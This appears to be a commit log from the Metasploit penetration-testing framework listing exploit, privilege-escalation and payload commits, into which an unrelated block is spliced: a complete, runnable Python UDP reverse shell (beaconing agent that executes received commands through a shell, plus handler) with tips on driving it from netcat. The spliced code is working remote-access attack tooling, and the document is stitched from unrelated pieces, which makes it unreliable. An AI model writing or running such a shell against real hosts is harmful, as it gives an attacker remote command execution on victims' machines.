RageLtMan
721163bd67
Python shell via reverse UDP
...
Python-based UDP egress shell, another PoC of the protocol used
as a raw transport.
2018-01-23 02:00:56 -05:00
RageLtMan
ef1d4ddb03
Add UDP handlers and payloads (redux)
...
This is a repackaging effort for the work I originally pushed in
6035. This segment of the PR provides UDP session handlers for
bind and reverse sessions, a Windows Metasm stager (really the
TCP stager with a small change), and a pair of socat payloads for
testing simple UDP shells. Netcat or any scripting language with
a sockets library is sufficient to use these sessions as they are
stateless and simple.
Testing of this PR requires rex/core #1 and rex/socket #2
The SSL testing which was being done on 6035 is backed out, left
for a later time when we can do DTLS properly.
2018-01-23 02:00:55 -05:00
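Added example, not Metasploit's code and not RageLtMan's: a minimal Python UDP reverse shell of the kind the two commits above describe, with the connect-back agent and the handler in one file so it runs offline over loopback. The names (`run_agent`, `UdpHandler`, `demo`), the beacon/`exit` convention and the 1400-byte reply chunk size are assumptions made for this illustration, not the framework's UDP session protocol. It shows the two properties the commit message relies on, that the session is stateless and that any datagram sender can drive it, and the caveats that follow from them: there is no end-of-stream marker, so the handler reads until the agent goes quiet; one `sendto()` is one datagram, so long output must be split; and the peer check is only a noise filter, since UDP source addresses are trivially spoofable.

```python
import socket
import subprocess
import threading

BUF = 65535   # largest payload a single UDP datagram can carry
CHUNK = 1400  # assumed reply chunk size, kept under a typical Ethernet MTU


def run_agent(handler_addr, timeout=5.0):
    """Connect-back agent: beacon to the handler, then run each datagram as a shell command.

    Returns the number of commands executed (used by the self-test)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(b"\n", handler_addr)  # the beacon is how a stateless UDP "session" begins
    executed = 0
    try:
        while True:
            try:
                data, peer = sock.recvfrom(BUF)
            except socket.timeout:
                break  # no FIN in UDP: silence is the only sign the handler is gone
            if peer != handler_addr:
                continue  # noise filter only; UDP source addresses are trivially spoofable
            cmd = data.decode(errors="replace").strip()
            if cmd == "exit":
                break
            try:
                proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=timeout)
                output = proc.stdout + proc.stderr
            except subprocess.TimeoutExpired:
                output = b"[command timed out]\n"
            output = output or b"\n"  # always answer, so the handler can tell "done" from "lost"
            # one sendto() is one datagram: split long output rather than let it be dropped
            for i in range(0, len(output), CHUNK):
                sock.sendto(output[i:i + CHUNK], handler_addr)
            executed += 1
    finally:
        sock.close()
    return executed


class UdpHandler:
    """Listener side: wait for a beacon, then drive the agent one command at a time."""

    def __init__(self, bind=("127.0.0.1", 0)):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.sock.bind(bind)
        self.addr = self.sock.getsockname()  # port 0 lets the OS pick a free port
        self.peer = None

    def wait_for_beacon(self, timeout=5.0):
        self.sock.settimeout(timeout)
        _, self.peer = self.sock.recvfrom(BUF)
        return self.peer

    def run(self, cmd, first_timeout=5.0, quiet_timeout=0.3):
        """Send a command and collect its output.

        UDP has no end-of-stream marker, so read until the agent goes quiet."""
        self.sock.sendto(cmd.encode() + b"\n", self.peer)
        chunks = []
        self.sock.settimeout(first_timeout)
        while True:
            try:
                data, peer = self.sock.recvfrom(BUF)
            except socket.timeout:
                break
            if peer == self.peer:
                chunks.append(data)
            self.sock.settimeout(quiet_timeout)
        return b"".join(chunks)

    def close(self):
        if self.peer:
            self.sock.sendto(b"exit\n", self.peer)
        self.sock.close()


def demo(cmd="echo hello"):
    """Run handler and agent in one process over loopback; returns the command output bytes."""
    handler = UdpHandler()
    agent = threading.Thread(target=run_agent, args=(handler.addr,), daemon=True)
    agent.start()
    handler.wait_for_beacon()
    try:
        return handler.run(cmd)
    finally:
        handler.close()
        agent.join(5)


if __name__ == "__main__":
    print(demo().decode())
```

Because the agent is driven by bare datagrams, the handler side can be replaced by a UDP-capable netcat (for example `nc -u -l PORT` with the OpenBSD variant; flags differ between netcat builds), which is the point the commit message makes about these sessions being usable from any sockets library.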
Brent Cook
03d1523d43
Land #6611, add native DNS to Rex, MSF mixin, sample modules
2018-01-22 23:54:32 -06:00
Brent Cook
a6e5944ec5
fix msftidy, add nicer errors on bind failure
2018-01-22 23:37:39 -06:00
Brent Cook
aae77fc1a4
Land #9349, GoAhead LD_PRELOAD CGI Module
2018-01-22 23:10:36 -06:00
Pedro Ribeiro
621868b7fb
Add CVE numbers
2018-01-23 11:26:39 +07:00
Brent Cook
d1569f8280
Land #9413, Expand the number of class names searched when checking for an exploitable JMX server
2018-01-22 16:49:01 -06:00
Brent Cook
10fde42adc
Land #9431, Fix owa_login to handle inserting credentials for a hostname
2018-01-22 16:46:39 -06:00
Brent Cook
b12953fa85
Land #9404, update module author
2018-01-22 16:41:50 -06:00
Brent Cook
04d305feb3
update SSL Labs scanner with new API, be robust
...
This updates the SSL Labs scanner to know about new additions to the API, and prevents the module from breaking again just because there is new JSON in the output. I couldn't figure out how to get the Api class to print messages normally, and there is some other output that needs to be added. But the module does work again.
2018-01-22 16:32:16 -06:00
UnaPibaGeek
ae93162faf
HSTS eraser module
2018-01-22 18:53:16 -03:00
Wei Chen
394c31c1e3
Remove NoMethod Rescue for cerberus_sftp_enumusers
...
Please see reasons in #9436
2018-01-22 11:10:23 -06:00
Wei Chen
38d056b930
Land #9436 - Fix cerberus_sftp_enumusers undefined method start for nil
...
Land #9436
Thanks Steve!
2018-01-22 11:07:23 -06:00
Wei Chen
85d018096b
Pass password_prompt and non_interactive to fix #8970
...
Fix #8970
2018-01-22 11:06:12 -06:00
Brent Cook
682c915a09
Land #9267, Add targets to sshexec
2018-01-22 09:59:48 -06:00
Pedro Ribeiro
b734af4e79
Add my advisory URL
2018-01-22 22:00:48 +07:00
Pedro Ribeiro
c1fe355329
Create exploit for AsusWRT LAN RCE
2018-01-22 21:44:02 +07:00
Brent Cook
69818aea22
update payload sizes
2018-01-21 08:03:07 -06:00
Pearce Barry
2a6b3671bf
Add connection addr+port info to http response object.
...
Update owa_login to use this instead of doing lookups on its own.
2018-01-19 13:37:33 -06:00
Steve Embling
8f75d3a46b
Possible fix to changes in net::ssh usage
2018-01-19 15:10:14 +00:00
Kevin Kirsche
c7d3b5dfbb
Update payload and disable check functionality
...
The check functionality is broken as MSF cannot handle HttpServer and HttpClient at this time.
The payloads were updated to ensure CVE-2017-10271 is being exploited instead of CVE-2017-3506 as explained on https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/
2018-01-18 13:26:44 -05:00
Brent Cook
7849743789
update stageless python sizes
2018-01-18 00:41:58 -06:00
Pearce Barry
e9ce2374e5
Auto-resolve target if it's a hostname (owa_login).
...
Ensures the module does save the creds which it claims to be saving. See MS-2968.
2018-01-17 16:47:21 -06:00
Aaron Soto
9328374155
Update 'author' field of metadata
2018-01-17 16:43:37 -06:00
Adam Cammack
0f0b116751
Rename scanner bits to avoid confusion
2018-01-17 14:46:31 -06:00
Aaron Soto
10cf327c26
Improve Hyper-V tests in checkvm
...
All Win10 machines, physical and virtual, were being reported as 'Hyper-V' (false positives)
Added functionality to extract hostname of physical hypervisor from VM registry
2018-01-17 14:29:03 -06:00
bwatters-r7
4c11eae774
Maybe that timeout is needed.....
2018-01-17 13:21:36 -06:00
Adam Cammack
c7894f1d74
Split long lines and add comments
2018-01-17 12:04:12 -06:00
Philippe Tranca
35bec8d3cd
Fixed class names and added RMI interfaces
2018-01-17 17:10:36 +01:00
Philippe Tranca
d345008b20
Added all the classes that implement RMI server
2018-01-17 17:03:32 +01:00
bwatters-r7
f439edfa1a
Fixes by the fabled wvu
2018-01-17 08:20:52 -06:00
Brent Cook
d6e966b079
Land #9414, wp_admin_shell_upload - remove plugin dir after exploitation
2018-01-16 21:08:22 -06:00
Adam Cammack
37bf68869f
Add scanner for the open proxy from 'SharknAT&To'
2018-01-16 21:05:19 -06:00
Brendan Coles
5e11d36351
Add ABRT raceabrt Privilege Escalation module
2018-01-16 14:52:33 +00:00
attackdebris
1c156c3d3c
Add powershell payload to module
2018-01-16 14:30:02 +00:00
Brendan Coles
4ade798cef
Fix check for juju-run path
2018-01-16 07:19:48 +00:00
William Vu
e5bd36da1c
Land #9402, NIS bootparamd domain name disclosure
2018-01-15 15:36:00 -06:00
Daniel Teixeira
aa9b5e4419
Sync Breeze Enterprise Import Command
2018-01-15 20:46:40 +00:00
Christian Mehlmauer
2f9eebe28b
remove plugin dir
2018-01-15 14:48:59 +01:00
Philippe Tranca
dfb9941e95
Fix java_jmx_server exploit
...
Add test case when discovering RMI endpoint as the previous one was not complete
2018-01-15 12:13:09 +01:00
Nicky Bloor
333ee893d3
Tidied up platform detection, check method, and minor typos.
2018-01-14 18:28:40 +00:00
Brendan Coles
e1cbe4e906
Rename apport_chroot_priv_esc to apport_abrt_chroot_priv_esc
2018-01-14 08:33:43 +00:00
Brendan Coles
c234d0523a
Add support for abrt on Fedora
2018-01-14 08:33:10 +00:00
Brendan Coles
c94763bfe0
Add Juju-run Agent Privilege Escalation module
2018-01-14 05:57:17 +00:00
William Vu
736d438813
Address second round of feedback
...
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.
Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
2018-01-13 22:55:01 -06:00
Nicky Bloor
6568d29b67
Add BMC Server Automation RSCD Agent RCE exploit module.
2018-01-14 01:12:55 +00:00
William Vu
1a8eb7bf2a
Update nis_ypserv_map after bootparam feedback
...
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
2018-01-13 15:40:17 -06:00
William Vu
c080329ee6
Update module after feedback
...
Looks like I can't decide on certain style preferences.
Not keen on using blank?, but I've used it before. Time to commit?
Also, fail_with has been fixed for aux and post since #8643. Use it!
2018-01-13 15:40:11 -06:00
Brendan Coles
2f3e3b486a
Use cross-compiled exploit
2018-01-13 05:44:42 +00:00
Brendan Coles
d172259f5d
umlaut
2018-01-13 16:06:11 +11:00